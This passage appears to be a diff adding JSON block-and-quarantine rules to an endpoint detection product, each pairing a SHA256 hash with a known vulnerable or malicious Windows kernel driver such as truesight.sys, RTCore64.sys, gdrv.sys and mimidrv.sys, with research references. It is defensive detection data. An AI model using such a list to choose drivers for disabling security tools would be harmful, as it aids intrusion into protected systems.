"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "543c3f024e4affd0aafa3a229fa19dbe7a70972bb18ed6347d3492dd174edac5", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "40e7da86-a488-59a9-a674-b15cac9c3914", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616294Z", + "creation_date": "2026-03-23T11:45:29.616296Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616302Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"40ef771e-b860-5576-bbd0-6397a9fa6ba8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472611Z", + "creation_date": "2026-03-23T11:45:31.472614Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472622Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62d9564c56479d3c20474f2a0a563d9fd674d8546de2c9b92d54a6c6d909aae2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "40f0aa3e-e04b-5113-9a12-42e323c248f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821612Z", + "creation_date": "2026-03-23T11:45:30.821615Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.821623Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dda2a604bb94a274e23f0005f0aa330d45ca1ea25111746fb46fa5ef6d155b1d", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "40f26117-0b2a-5270-89ba-8987b7df09b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480401Z", + "creation_date": "2026-03-23T11:45:30.480407Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480418Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b465faf013929edf2f605c8cd1ac7a278ddc9a536c4c34096965e6852cbfb51", + "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "40fa6648-8ac5-5c00-94ae-bd7aa0cb522f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484656Z", + "creation_date": "2026-03-23T11:45:31.484659Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484669Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0c18166aadea1991c0ce4c7c5005c69d46cb9f641632e2fcc76ca4904ce1097", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "40fc0a8c-7d0e-5130-a1b5-18b1c7919e99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813630Z", + "creation_date": "2026-03-23T11:45:31.813632Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"142889356b39784bbeb55dd363909856502fb3e5f6fb506c46eb6ecbe4de3269", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4101429b-28fa-5714-b24e-ffe18be8aad8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464246Z", + "creation_date": "2026-03-23T11:45:30.464249Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464258Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee7b8eb150df2788bb9d5fe468327899d9f60d6731c379fd75143730a83b1c55", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41070809-348d-5f77-873a-25533d9b99d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" 
+ }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471348Z", + "creation_date": "2026-03-23T11:45:30.471352Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471362Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b1d0fdfddddfe520afc18b79b18b5eef730f7586639bd05857a41c0d09a9b9e6", + "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/fbdd993b-47b1-4448-8c41-24c310802398/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41184a19-2d2e-5be1-a61f-ce9d5417a2b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831236Z", + "creation_date": "2026-03-23T11:45:30.831238Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831244Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb0e276462962a84013194cd6f17cd604ac7775ffeea4ef4af3b2a510fc3a116", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", 
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "411b3cfd-b389-50de-8042-4a714c66310c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605989Z", + "creation_date": "2026-03-23T11:45:29.605991Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605997Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f29073dc99cb52fa890aae80037b48a172138f112474a1aecddae21179c93478", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41292acc-d9b3-5747-9f86-f3709c2082a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493329Z", + "creation_date": "2026-03-23T11:45:31.493331Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493337Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be322d0beee8d45e0408de69ef9a27dddbefddf20f598716287bb16d3e4db549", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4130a484-9097-5047-8497-3842db87ca41", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813612Z", + "creation_date": "2026-03-23T11:45:31.813614Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e92d6b974a50604b907b3f882a49cc75f0e54a027232d813aab13251257cb67", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4141f367-f7c7-5020-a410-ef19da7cb172", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155380Z", + "creation_date": "2026-03-23T11:45:31.155382Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155387Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71b7882a9b91d824c6c84fc30c5c1548fafb4e0d0eab9bfa2b45d087426a261d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "414667a5-0729-5123-8b4f-769fc65396d2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613951Z", + "creation_date": "2026-03-23T11:45:29.613953Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613959Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85ac17aec836d5125db7407d2dc3af8e5b01241fea781b2fd55aae796b3912b4", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4147429d-3679-5a6c-be91-1312caff0657", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822637Z", + "creation_date": "2026-03-23T11:45:30.822639Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822644Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06c40abdf980ea22c8c4c50d9599db95d586354a8177e2cd670124e46a22a1f1", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "414ad226-9f53-5ece-b52f-8260ddbede02", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609411Z", + "creation_date": "2026-03-23T11:45:29.609413Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609419Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c92d943a465e20f50bae8d46ea38b635d2da85ae4e34f0170fd6f451890c76d7", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "414cd694-d4ff-5db9-8967-bb70dce84134", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976696Z", + "creation_date": "2026-03-23T11:45:29.976698Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976704Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d579b1853c528e54464c2607e559591ee01b0ab75bc016c14de1c38068328a81", + "comment": "Malicious Windows 
Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4152ad10-3964-505e-8553-37a2ac65bec1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604109Z", + "creation_date": "2026-03-23T11:45:29.604111Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604117Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "facc577070cf72cb8d9247e36054fcb30c60a35ae056cffac7411648c513e642", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "415b6f59-ed24-59b7-8e81-32dc2311d321", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827158Z", + 
"creation_date": "2026-03-23T11:45:31.827160Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827165Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c7ff86dc7076bdbb447663074f8fe865a6a2df699dec55ffe0a268f086a3b9b2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "415df284-d94d-59f2-9e4a-969b80a31fd0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488604Z", + "creation_date": "2026-03-23T11:45:31.488606Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488611Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "51a63a7cd94daa409f8ef380dd382efe5b0a667092333d06115d2ff370991736", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41727382-77d5-52db-9e3f-8a2497681a31", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492539Z", + "creation_date": "2026-03-23T11:45:31.492541Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492546Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b280e3370a7ea9f36a88fe087c4c0cd078274d7910726ff4dfe996786a0ffa9e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "417d8ba5-a58a-527b-8bb3-97c60564f7c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607706Z", + "creation_date": "2026-03-23T11:45:29.607708Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607713Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8399e5afd8e3e97139dffb1a9fb00db2186321b427f164403282217cab067c38", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "417e97dd-2309-5a74-a10f-3ddd39819a3d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983630Z", + "creation_date": "2026-03-23T11:45:29.983632Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8920dedd3c5488ecc1db2ace55b2000d4cebf899c5e591b429d3f7767eee2216", + "comment": "Vulnerable Kernel Driver (aka HOSTNT.sys) [https://www.loldrivers.io/drivers/e42cd285-4dda-4086-a696-93ab1d6f17ca/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4182c104-9471-5957-9e9d-a85182fa88b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468917Z", + "creation_date": "2026-03-23T11:45:30.468920Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468929Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ccadd6f8b6705e756544646d99f97030f291fc68377ce06f71e8c55512941c47", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "418aeb05-9824-5d35-a1fc-469cb07f4177", + "test_maturity_current_count": 0, 